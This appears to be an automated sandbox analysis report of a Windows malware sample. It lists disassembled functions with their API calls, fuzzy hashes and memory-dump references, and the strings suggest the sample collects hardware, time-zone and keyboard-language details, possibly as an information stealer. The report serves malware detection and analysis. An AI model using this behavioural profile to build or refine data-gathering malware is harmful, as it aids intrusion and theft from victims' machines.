Opcode Fuzzy Hash: 2d4f6e94e532a2b82f51f5e4c1b99874bb7397b119eec0f2a406502f3f1153ab
Instruction Fuzzy Hash: AC01A2B1F01208ABEF04EFB4EC49AFE77B8EF04700F440066F612DA280EA309C419750

Function 0009BC21 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,763374F0,?,0009CBEE,?,0009CC7C,00000000,06400000,00000003,00000000,0009757F,.exe,000B6C5C), ref: 0009BC6E
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,763374F0,?,0009CBEE,?,0009CC7C,00000000,06400000,00000003,00000000), ref: 0009BCA6

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: 91536c1652fc4f4fcb26b7b48219555f4ebf63584d7f241e948f6b0d400795fe
Instruction ID: 929e99f4aea00bed99b8fccb3586907965a13e32102e4576fc322b879a237102
Opcode Fuzzy Hash: 91536c1652fc4f4fcb26b7b48219555f4ebf63584d7f241e948f6b0d400795fe
Instruction Fuzzy Hash: 993185F0505705DFDF709F25AAC4B277AE8AB15368F108E2EF19782581E3349884EB12

Function 00084AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AE8
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AEE
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AF4
lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00084B06
InternetCrackUrlA.WININET(000000FF,00000000), ref: 00084B0E

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID:
API String ID: 1274457161-0
Opcode ID: 8b907adafe743c9af23b8d15c49becc25c6298975255969e0a02ee2a45ba29cd
Instruction ID: 2bc67e2f4556ea46d665cd1b69887c04089eac78351d8166370ac468ad471b35
Opcode Fuzzy Hash: 8b907adafe743c9af23b8d15c49becc25c6298975255969e0a02ee2a45ba29cd
Instruction Fuzzy Hash: D7012131D00218ABDF149BA9EC45ADEBFB8EF55330F108216F965F72E0D7745A058B94

Function 00090F51 Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00094252,Processor: ,[Hardware],000B6950,00000000,TimeZone: ,000B6940,00000000,Local Time: ,000B692C), ref: 00090F65
HeapAlloc.KERNEL32(00000000,?,?,?,00094252,Processor: ,[Hardware],000B6950,00000000,TimeZone: ,000B6940,00000000,Local Time: ,000B692C,Keyboard Languages: ,000B6910), ref: 00090F6C
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,000B6888,?,?,?,00094252,Processor: ,[Hardware],000B6950,00000000,TimeZone: ,000B6940,00000000,Local Time: ), ref: 00090F8A
RegQueryValueExA.KERNEL32(000B6888,00000000,00000000,00000000,000000FF,?,?,?,00094252,Processor: ,[Hardware],000B6950,00000000,TimeZone: ,000B6940,00000000), ref: 00090FA6
RegCloseKey.ADVAPI32(000B6888,?,?,?,00094252,Processor: ,[Hardware],000B6950,00000000,TimeZone: ,000B6940,00000000,Local Time: ,000B692C,Keyboard Languages: ,000B6910), ref: 00090FAF

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 2e32b00c2404316b88e07945c9a2a133fdc7f044518bee1cbc778b50800011b0
Instruction ID: ab19ce2f7b0b55da148be262692ef949bd14463d5bb4d43deb647237bd0e45d3
Opcode Fuzzy Hash: 2e32b00c2404316b88e07945c9a2a133fdc7f044518bee1cbc778b50800011b0
Instruction Fuzzy Hash: F0F03A76A41204FFEF106B90FC0EFAA7B7CEB44B45F150066F601A90A0E7B09E509B60

Function 0009224A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,=,00000000,?), ref: 0009226C
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00092287
CloseHandle.KERNEL32(00000000), ref: 0009228E

Strings

=, xrefs: 0009225D, 00092262

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID: =
API String ID: 3183270410-4144325766
Opcode ID: 23487d5ba0a65d0d219d5b5478d2a8d49b6e8a848d1dcdbc5db7c1877a927828
Instruction ID: 59e1dd7d6ce38e1716a23a5001d9d8654e17db1dfd09468b76dbf23451b0a208
Opcode Fuzzy Hash: 23487d5ba0a65d0d219d5b5478d2a8d49b6e8a848d1dcdbc5db7c1877a927828
Instruction Fuzzy Hash: 1DF0B475600208BBDB20AB68EC49FEEB7B89B44704F410056F645DB180EEB4DD859B51

Function 00096E97 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,?,?), ref: 00096EFE
CreateThread.KERNEL32(00000000,00000000,00096DC6,?,00000000,00000000), ref: 00096F36
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00096F3E

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWait
String ID:
API String ID: 4198075804-0
Opcode ID: 5d1491e95ee119c3c2822c5288b5a75edadef85775b39035a421b8abb1668e70
Instruction ID: 20258dd5a1c7376969cbce26dc2db5613bf9ac70134264ae31a45e5f11089902
Opcode Fuzzy Hash: 5d1491e95ee119c3c2822c5288b5a75edadef85775b39035a421b8abb1668e70
Instruction Fuzzy Hash: 02210372800218ABCF10EF95E8459EE7BB8FF40354F118126FD15A7212D735AA86DBA0

Function 00090C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00081385), ref: 00090C91
HeapAlloc.KERNEL32(00000000,?,?,?,00081385), ref: 00090C98
GetComputerNameA.KERNEL32(00000000,00081385), ref: 00090CAC

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 6587dc4662c4ea271c807f27523e0e5d02053be23c3723aba2eccda8e4db3d96
Instruction ID: ec6a3d2296a815101514ab8b902ac25ebb66082c42130ef9f96933aee2df34c9
Opcode Fuzzy Hash: 6587dc4662c4ea271c807f27523e0e5d02053be23c3723aba2eccda8e4db3d96
Instruction Fuzzy Hash: DEE08CB1204204BBF740AB99DC4DFCB76ACDB80715F000225F605D2250EAB889448720

Function 00091E1F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00096931,?), ref: 00091E37

Strings

1i, xrefs: 00091E47

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID: 1i
API String ID: 3494564517-386612991
Opcode ID: b4c3262e2bf6fa4b7f6e068cae7f93d0b3cdc944a5aa9c79c686f10ebdcf9cf3
Instruction ID: 389801a4f0928a39a57a05587748f6f6748106b9ccebbb3387034d40924de169
Opcode Fuzzy Hash: b4c3262e2bf6fa4b7f6e068cae7f93d0b3cdc944a5aa9c79c686f10ebdcf9cf3
Instruction Fuzzy Hash: 58E02B36F017121FCF72092A98049B6BBDB9FC2FA4759412AFE48CB314D531CC0182E0

Function 0009CBB8 Relevance: 2.5, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0009CBC9

Part of subcall function 0009BB6C: lstrlenA.KERNEL32(?,0009CBDA,0009CC7C,00000000,06400000,00000003,00000000,0009757F,.exe,000B6C5C,000B6C58,000B6C54,000B6C50,000B6C4C,000B6C48,000B6C44), ref: 0009BB9E
Part of subcall function 0009BB6C: malloc.MSVCRT ref: 0009BBA6
Part of subcall function 0009BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0009BBB1

malloc.MSVCRT ref: 0009CC06

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: malloc$lstrcpylstrlen
String ID:
API String ID: 2974738957-0
Opcode ID: a45e7a8e5429ed24a864159083323a876f5c014ea9fc39af22a4b9f47688479f
Instruction ID: a6f201782ef63c9cec62e8a63dd4d55fcd18ca63971cfa1999fce495759f272b
Opcode Fuzzy Hash: a45e7a8e5429ed24a864159083323a876f5c014ea9fc39af22a4b9f47688479f
Instruction Fuzzy Hash: 86F096B29052159BEF206F65ED45D5A7B94EB447B0F054111ED0897292DB30DC00A7B0

Function 000984AE Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9116eb677b7528a093caf24ab39d5018dcbae292368bb5b6d4138e1efa256935
Instruction ID: 7fd9191d9befd6f9deca48ddd1d06023be9a9f1f71b361f95a97bb173c8a7580
Opcode Fuzzy Hash: 9116eb677b7528a093caf24ab39d5018dcbae292368bb5b6d4138e1efa256935
Instruction Fuzzy Hash: 5D519372901A00ABCFF17BFD844AAF8B2D86F62314B158486F4548A333DF158D996F51

Function 00091DBC Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00091DFD

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
